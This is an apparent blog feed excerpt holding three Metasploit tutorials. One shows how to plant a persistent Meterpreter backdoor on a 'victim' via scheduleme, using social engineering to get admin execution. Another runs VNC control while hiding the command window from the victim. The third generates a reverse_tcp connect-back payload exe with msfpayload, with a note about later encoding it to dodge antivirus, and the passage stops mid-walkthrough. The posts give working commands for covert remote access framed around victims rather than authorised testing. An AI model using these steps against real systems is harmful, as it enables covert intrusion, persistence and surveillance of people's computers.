/><author><name>Security Exploiter</name><uri>http://www.blogger.com/profile/17393169150191998081</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>4</thr:total><feedburner:origLink>http://securityexploiter.blogspot.com/2010/11/what-video-tutorials-would-you-like-to.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkIEQ3Y-cSp7ImA9Wx9TGUg.&quot;"><id>tag:blogger.com,1999:blog-1859513259990287065.post-6914408645017892343</id><published>2010-11-28T05:21:00.000-08:00</published><updated>2010-11-28T05:21:42.859-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-11-28T05:21:42.859-08:00</app:edited><title>HOW TO: Metasploit Meterpreter as a Backdoor</title><content type="html">&lt;span class="Apple-style-span" style="color: #38761d;"&gt;This tutorial is for making a backdoor one the victims system which we can use to reconnect to them if we wish to.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;iframe title="YouTube video player" class="youtube-player" type="text/html" width="640" height="390" src="http://www.youtube.com/embed/0QFlwVLmyb0" frameborder="0"&gt;&lt;/iframe&gt;&lt;br /&gt;
&lt;div&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;For this we will be using the Scheduleme command but for this to work properly on windows vista and windows 7 the victim would have to open the exe as administrator. This is easy to ensure if you apply the correct social engineering. &lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;The meterpreter session will run as the user id of the currect user. Then use the "use privs" command to get better privliages and more options then by typing "help" will list most of the avalible commands for you to use.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;The "use privs" command might have been taken out in the new versions of metasploit instead i think it loads it automatically just try it out, and ill get back to you on this.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;Using scheduleme command &lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;running the below command will show you all the options avalible &lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&amp;gt;"run scheduleme -h"&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;The command i use is below &lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&amp;gt;"run scheduleme -m -1 -u -e /root/exploit.exe&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;Break down the command:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;the -m options specifies how often the schedeld task will run so i did "-m -1" so every 1 mins it is started.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;the -u starts the user name of the account with admin privs&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;the - e is the exe you want to upload to the victim which you want to use for you back door so mine is in root directory so -e /root/exploit.exe would be my option&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;Now its been uploaded exit meterpreter session and start the listener again and wait for a min for a connection ...watch video!&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;NOTE: The EXE which is uploaded must obviously configured to connect back to you and u create this exe just alike all the others.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1859513259990287065-6914408645017892343?l=securityexploiter.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/me8srPocsF6smC4OOceCPkzhM38/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/me8srPocsF6smC4OOceCPkzhM38/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/me8srPocsF6smC4OOceCPkzhM38/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/me8srPocsF6smC4OOceCPkzhM38/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityExploiter/~4/6ukRCj9u6_k" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://securityexploiter.blogspot.com/feeds/6914408645017892343/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://securityexploiter.blogspot.com/2010/11/how-to-metasploit-meterpreter-as.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1859513259990287065/posts/default/6914408645017892343?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1859513259990287065/posts/default/6914408645017892343?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SecurityExploiter/~3/6ukRCj9u6_k/how-to-metasploit-meterpreter-as.html" title="HOW TO: Metasploit Meterpreter as a Backdoor" /><author><name>Security Exploiter</name><uri>http://www.blogger.com/profile/17393169150191998081</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://img.youtube.com/vi/0QFlwVLmyb0/default.jpg" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://securityexploiter.blogspot.com/2010/11/how-to-metasploit-meterpreter-as.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUUDQ30zcSp7ImA9Wx9TGU0.&quot;"><id>tag:blogger.com,1999:blog-1859513259990287065.post-7174089632193541117</id><published>2010-11-27T16:14:00.000-08:00</published><updated>2010-11-27T16:14:32.389-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-11-27T16:14:32.389-08:00</app:edited><title>How To Get a VNC Session Inside a Meterpreter Session While Still Having Access To The Meterpreter Command Line</title><content type="html">&lt;span class="Apple-style-span" style="color: #38761d;"&gt;If you&amp;nbsp;didn't&amp;nbsp;no what VNC was then its remote control software which lets you see and interact with desktop applications across any network.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;iframe class="youtube-player" frameborder="0" height="385" src="http://www.youtube.com/embed/sHJsWMijJo0" title="YouTube video player" type="text/html" width="640"&gt;&lt;/iframe&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;In metasploit there is a .rb script that allows you to control a remote computer like VNC and its located at /opt/metasploit3/msf3/scripts/meterpreter/ and called vnc.rb this script is all well and good but it just creates a VNC session and that's it. It doesnt give you the option to carry on using Meterpreter so I came accross a script which will allow you to still use meterpreter in the background which is useful when you still what to do background operations like uploading and downloading and edits to the&amp;nbsp;registry&amp;nbsp;etc..&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;In the video:&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;I explain how to create the script and use it.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;You can download the script from &lt;a href="http://www.megaupload.com/?d=GE50NHEU"&gt;HERE&lt;/a&gt;&amp;nbsp;its in .txt format&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;Then using nano which is a console based text editor installed in backtrack I create the scripts into the /opt/metasploit3/msf3/scripts/meterpreter/ location and give them the file extension .rb which is a ruby file.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;Watch Video If Unsure!!!.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;But there is a problem with this script if you want to be more hidden. The script spawns a Command shell prompt on the victims screen in plane site. to get around this I modify the file to include this line:&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;mul.datastore['DisableCourtesyShell'] = true&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;Watch the video as to where to place it in the file.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Times New Roman'; font-size: small;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;To run the script from meterpreter just type "run &amp;lt;filename.rb&amp;gt;" then a vnc screen has been created and you can control the remote machine but also if you go&amp;nbsp;back&amp;nbsp;to you meterpreter session and hit enter a few times you will still have you command line with full access :)&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;This is a great book for learning the Metasploit framewaork!&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Times New Roman'; font-size: small;"&gt;&lt;a href="http://www.amazon.com/Metasploit-Penetration-Development-Vulnerability-Research/dp/1597490741?ie=UTF8&amp;amp;tag=security078-20&amp;amp;link_code=btl&amp;amp;camp=213689&amp;amp;creative=392969" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;Metasploit Toolkit for Penetration Testing, Exploit Development, and Vulnerability Research&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;img alt="" border="0" height="1" src="http://www.assoc-amazon.com/e/ir?t=security078-20&amp;amp;l=btl&amp;amp;camp=213689&amp;amp;creative=392969&amp;amp;o=1&amp;amp;a=1597490741" style="border: none !important; margin: 0px !important; padding: 0px !important;" width="1" /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: 12px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1859513259990287065-7174089632193541117?l=securityexploiter.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/jC4mgHFsl9yI27Ix_GYrOiypLWk/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/jC4mgHFsl9yI27Ix_GYrOiypLWk/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/jC4mgHFsl9yI27Ix_GYrOiypLWk/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/jC4mgHFsl9yI27Ix_GYrOiypLWk/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityExploiter/~4/XA_v5fPkAUw" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://securityexploiter.blogspot.com/feeds/7174089632193541117/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://securityexploiter.blogspot.com/2010/11/how-to-get-vnc-session-inside.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1859513259990287065/posts/default/7174089632193541117?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1859513259990287065/posts/default/7174089632193541117?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SecurityExploiter/~3/XA_v5fPkAUw/how-to-get-vnc-session-inside.html" title="How To Get a VNC Session Inside a Meterpreter Session While Still Having Access To The Meterpreter Command Line" /><author><name>Security Exploiter</name><uri>http://www.blogger.com/profile/17393169150191998081</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://img.youtube.com/vi/sHJsWMijJo0/default.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://securityexploiter.blogspot.com/2010/11/how-to-get-vnc-session-inside.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUMHR3o8eip7ImA9Wx9TGU0.&quot;"><id>tag:blogger.com,1999:blog-1859513259990287065.post-673646165242429101</id><published>2010-11-27T06:30:00.000-08:00</published><updated>2010-11-27T16:17:16.472-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-11-27T16:17:16.472-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="hack metasploit meterpreter reverse_tcp tcp reverser backtrack 4 linux windows os computers" /><title>Intro: Metasploit Meterpreter Reverse TCP Payload exe at First Glance</title><content type="html">&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;b&gt;&lt;u&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;iframe align="left" frameborder="0" marginheight="0" marginwidth="0" scrolling="no" src="http://rcm.amazon.com/e/cm?t=security078-20&amp;amp;o=1&amp;amp;p=8&amp;amp;l=bpl&amp;amp;asins=1597490741&amp;amp;fc1=000000&amp;amp;IS2=1&amp;amp;lt1=_blank&amp;amp;m=amazon&amp;amp;lc1=0000FF&amp;amp;bc1=000000&amp;amp;bg1=FFFFFF&amp;amp;f=ifr" style="align: left; height: 245px; padding-right: 10px; padding-top: 5px; width: 131px;"&gt;&lt;/iframe&gt;In this video I show you how to make a basic reverse TCP payload in Metasploits Meterpreter Program.&amp;nbsp;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;b&gt;&lt;u&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;A bit of info on The Metasploit Project:&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="font-family: tahoma, sans-serif; font-size: 14px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;"Metasploit provides useful information and tools for penetration testers, security researchers, and IDS signature developers. This project was created to provide information on exploit techniques and to create a functional knowledgebase for exploit developers and security professionals. The tools and information on this site are provided for legal security research and testing purposes only. Metasploit is an open source project."&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="font-family: tahoma, sans-serif; font-size: 14px;"&gt;&lt;a href="http://www.metasploit.com/"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;http://www.metasploit.com/&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;This program is avalible for Windows and Linux (I tried using it on windows and hated it) and is updated about daily.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;Its one of the best, free programs for pentesting/exploiting.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;In the video i show you how to use the program in Linux if you use it in Windows the commands could be slightly different.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;object height="385" width="640"&gt;&lt;param name="movie" value="http://www.youtube.com/v/XbG8qW_COaQ?fs=1&amp;amp;hl=en_GB"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/XbG8qW_COaQ?fs=1&amp;amp;hl=en_GB" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="640" height="385"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;b&gt;&lt;u&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;In the video:&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;I show you how to make a basic Reverse_tcp payload. Open the client and use this code " ./msfpayload windows/meterpreter/reverse_tcp LHOST=&amp;lt;your ip adddress&amp;gt; LPORT=&amp;lt;Your Listening Port&amp;gt; x &amp;gt; /root/&amp;lt;filename.exe&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;b&gt;&lt;u&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;Explanation:&amp;nbsp;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;LHOST is the address of which you what you exe to connect back on to you this can be internal or external ip. To find you internal ip in Linux just open terminal and type "ifconfig" and you shall see it.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;LPORT is the port you what your exe to connect back to you on so make sure its forwarded properly.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;the line " x &amp;gt; /root/&amp;lt;filename.exe&amp;gt; " is basically saying create an exe " x " and to send it to " &amp;gt; /root/filename.exe " which is your root folder on Linux. This file exe will only work for windows there are the same exploits for other OS but as windows is most&amp;nbsp;common&amp;nbsp;I will use this.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;so an example would be this&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;" ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.66 LPORT=4444 x &amp;gt; /root/reverse_tcp.exe "&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;There are extra commands which will encode your exe as to help bypass AV (AntiVirus) but I will cover them on a later post as this is intended for the very basic, first&amp;nbsp;glance&amp;nbsp;look at it and&amp;nbsp;how&amp;nbsp;it works.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;Next copy the exe you just created to the (victim BOX), if you havent noticed I use a Virtual Machine running Backtrack 4 and XP Pro.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;So now we need to open a listener so we can listen for the exe connecting back so that we get a session.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px;"&gt;&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
